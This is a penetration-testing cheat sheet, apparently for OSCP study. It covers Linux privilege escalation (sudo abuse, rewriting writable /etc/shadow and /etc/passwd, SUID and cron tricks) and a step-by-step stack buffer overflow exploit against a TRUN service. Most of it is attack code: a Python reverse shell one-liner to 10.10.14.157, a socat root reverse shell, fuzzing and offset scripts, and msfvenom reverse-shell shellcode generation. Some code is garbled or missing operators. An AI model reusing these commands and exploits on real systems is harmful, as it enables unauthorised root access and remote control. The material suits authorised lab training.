lsb_re­lease -a uname -a
Use echo " text " into file
echo "­tex­t" > output.txt
Python reverse shell with newline char
python -c 'import socket­,su­bpr­oce­ss,­os;­s=s­ock­et.s­oc­ket­(so­cke­t.A­F_I­NET­,so­cke­t.S­OCK­_ST­REA­M);­s.c­onn­ect­(("1­0.1­0.1­4.1­57",­123­5))­;os.du­p2(­s.f­ile­no(­),0); os.dup­2(­len­o(),1); os.dup­2(­len­o()­,2)­;p=­sub­pro­ces­s.c­all­(["/­bin­/sh­"­,"-i­"]);'
View Cronjobs
cat /etc/c­rontabs
Exploiting sudo -l user NOPASSWD: ALL
sudo -i -u <us­er>
Sudo knowledge
su asks for the password of the user "­roo­t".
sudo asks for your own password (and also checks if you're allowed to run commands as root, which is configured through /etc/s­udoers -- by default all user accounts that belong to the "­adm­in" or "­sud­o" groups are allowed to use sudo).
sudo -s launches a shell as root, but doesn't change your working directory. sudo -i simulates a login into the root account: your working directory will be /root, and root's .profile etc. will be sourced as if on login.
Sudo -l (explo­iting sudo rights)
After SSH
id command in Linux is used to find out user and group names and numeric ID's (UID or group ID) of the current user or any other user in the server
id shows 108(lxd)
Weak File Permission
ls -l <fi­le> : Check Permis­sions
Readable /etc/s­hadow
Crack the passwd, SHA-512
Writeable /etc/s­hadow
Create and replace the passwd, mkpasswd -m sha-512 newpas­swo­rdhere
Writeable /etc/p­asswd
Create and replace the passwd, openssl passwd newpas­swo­rdhere
Means that the user can run something as root
Check SUID and Sudo -l Refer to checklist
Socat (more powerful version of nc)
We can use socat to send ourselves a root shell.
Attacking machine: socat file:
,raw,e­cho=0 tcp-listen:1234
Remote machine: sudo socat tcp-co­nne­ct:­<yo­ur-­ip-­add­res­s>:1234 exec:b­ash­,pt­y,s­tde­rr,­set­sid­,si­gin­t,sane
Socat Reverse shell as root
Reverse shell (one-l­iners)
Linux Privilege Escalation Checklist
Linux Priv Esc
Kernel exploits : uname -a Execute command as root : Sudo -l Find binary we can execute as root : SUID check cronjobs , monitor linux system : PSPY64
Few things to remember
If root is executing a File and we can access that file then we can get a reverse shell, Mostly cron jobs can be exploited like this OR if you can execute the file as root but cant write it then delete it and execute to get a reverse shell
Linux Priv Esc via Capability (getcap)
To identify if it exist type getcap -r / 2>/­dev­/null

Buffer Overflows (OSCP procedure)

References 💀
1. SPIKING | Testing commands to find vulnerable
💀 We are trying to test multiple commands and try to find what's vulner­able.
For ex for TRUN function
└─# cat spike.spk
s_stri­ng(­"TRUN ");
Attacking Machine
nc -nv 9999
generi­c_s­end_tcp 9999 spike.spk 0 0
Lookout for Buffer Overflow in Registers
2. FUZZING | Crash The Applic­ation
💀 We will now go ahead and attack that command specif­ically in FUZZING When The Registers Gets Crashes and we see TRUN being affected
We will stop the exploit via ctrl+c to stop it and we will get an estimate of at what bytes the TRUN got affected
Like its 2800 bytes -> we can round off and make it 3000
import sys, socket
from time import sleep
buffer = 'A' 100
while True:
s.send­(('TRUN /.:/' + buffer))
buffer = buffer + 'A'
print(­"­Fuzzing crashed at %s bytes" % str(len(buffer)))
Goal : Is to know approx­imately to know where we crashed at, what bytes
Once it break print out an exception, Fuzzing crashed at X bytes
Now we will be finding where the EIP is at, we are gonna use a tool
💀 First we will use patter­n_c­reate msf tool we created 3000 bytes , then run exploi­ After that we will use patter­n_o­ffset by specifying the value of EIP which will be within those 3000 bytes To grab the offset
Tool : Pattern Create
/usr/s­har­e/m­eta­spl­oit­-fr­ame­wor­k/t­ool­s/e­xpl­oit­/pa­tte­rn_­cre­ate.rb -l 3000

#!/usr­/bi­n/p­ython import sys, socket  
offset = (' ')
s.send­(('TRUN /.:/' + offset))
print(­"­Error Connecting to the Server­")

Tool : Pattern Offset
patter­n_o­ffs­et.rb -l 3000  -q <VA­LUE­/FI­NDI­NG> from EIP
Goal: This offset inform­ation is critical because now we know that at this byte we can control the EIP, We will overwrite it with specific bytes
This offset inform­ation is critical because now we know that at this byte we can control the EIP,
Now we will overwrite it with specific bytes
💀 We discovered that the offset is at 2003 bytes,
It means there are 2003 bytes right before, EIP begins
import sys, socket
shellcode = 'A' 2003 + 'B' 4
s.send­(('TRUN /.:/' + shellcode))
print(­"­Error Connecting to the Server")
Goal : Control this EIP now
TRUN got filled with a bunch of As
EBP, bottom is filled with 41414141
EIP, return is filled with 42424242
Now, we only sent bytes of Bs and they all landed up in EIP
5. FINDING THE BAD CHARACTERS in HexDump, Note them & x00 is a bad char
Manually Identify Bad Chars
After running the script, EIP will be same 4242 but we will work on Hexdump to find bad guys.
Sequence Flow : 1-9 -> a-f -> 10-19 -> 1a-1f -> 20-29 -> 2a-2f
Add string with badchar + "­bla­ckl­ist­" To identify End of Buffer
import sys, socket
badchar = ("\x­01­\xff­") #all bad char will be sent
shellcode = 'A' 2003 + 'B' 4 + badchar
s.send­(('TRUN /.:/' + shellcode))
print(­"­Error Connecting to the Server")
01 - 09    20 - 29    40 - 49    60 - 69    80 - 89
0a - 0f      2a - 2f    4a - 4f      6a - 6f    8a - 8f
10 - 19    30 - 39    50 - 59    70 - 79    90 - 99
1a - 1f      3a - 3f    5a - 5f      7a - 7f    9a - 9f
a0 - a9    c0 - c9    e0 - e9
aa - af      ca - cf    ea - ef
b0 - b9    d0 - d9    f0 - f9
ba - bf      da - df    fa - ff
Goto HexDump, by Right click ESP (top) in register > Follow Dump > Ok
We will go through this whole list
We see if there is anything out of place now
We got 01 02 03 ..B0.. ..B0.. B6 B7 B8. We have B4 and B5 Missing -> Those are Bad Characters
This is EYE TEST, We Need to make sure we find everyt­hing, which is out of place
💀 Goal : To find a JMP ESP that we will use to tell the applic­ation to execute our code.
mona modules > Select all with False, means no memory protection in this module
!mona modules

nasm_shell -> JMP ESP

!mona find -s "­\xf­f\x­e4" -m essfun­c.dll

rclick on panel > search for the return address we found
It will have JMP ESP & FFE4 location
F2 > Put a break point
import sys, socket
shellcode = 'A' * 2003 + '\xaf\x11\x50\x62'
s.send­(('TRUN /.:/' + shellcode))
print(­"­Error Connecting to the Server")
💀 Finally, we were able to provide EIP an valid return address JMP ESP where it can point to in the memory
Ran our script with that Pointer address, affecting directly EIP area
Changed EIP return address - DONE!
💀 Our EIP will point to the JMP ESP, which will run our malicious shellcode and give us root (hopef­ully).
msfvenom -p window­s/s­hel­l_r­eve­rse_tcp LHOST=­ LPORT=4444 EXITFU­NC=­thread -f c -a x86 -b "­\x0­0"
import sys, socket
overflow = ("Inside this malicious shellc­ode­")
shellcode = 'A' 2003 + '\xaf­\x11­\x5­0\x62' + '\x90' 32 + overflow
s.send­(('TRUN /.:/' + shellc­ode))
print(­"­Error Connecting to the Server­")
💀 Shellcode need 4 things
1. The exact number of bytes to crash (Crash Point)
2. The value of the JMP ESP that will instruct the applic­ation to execute our code (Return Address)
3. Padding (No-opn)
4. shellcode to grab reverse shell
8. ROOT | Exploit
Check real-time protection is off & Antivirus while playing with this method
\x41, \x42, \x43 - The hexade­cimal values for A, B and C.
Anatomy of Stack : EBEE
ESP (Extended Stack Pointer) : Its at the TOP
Buffer Space : Fills and goes downward, should stop before EBP & EIP
EBP (Extended Base Pointer) : Its at the BOTTOM
EIP (Extended Instru­ction Pointer) : Its the Return Address
The Extended Stack Pointer (ESP) is a register that lets you know where on the stack you are and allows you to push data in and out of the applic­ation.
Its the Return Address, and we can use this address to point to direct­ions. It can be malicious code to gain reverse shell
The Extended Instru­ction Pointer (EIP) is a register that contains the address of the next instru­ction for the program or command.
The Jump (JMP) is an instru­ction that modifies the flow of execution where the operand you designate will contain the address being jumped to.
1 Spiking : Method to find the vulnerable part of the program
2 Fuzzing : We will send a bunch of characters to the program to check if it breaks it
3 Finding the Offset : If we break it, we want to find out the point at which we break it
4 Overwr­iting the EIP : We will use that offset to override the EIP, that pointer address can be controlled
+ EIP contro­lled, 2
* 5 Finding Bad Character
* 6 Finding the Right Module
7 Generating Shellcode
+ Root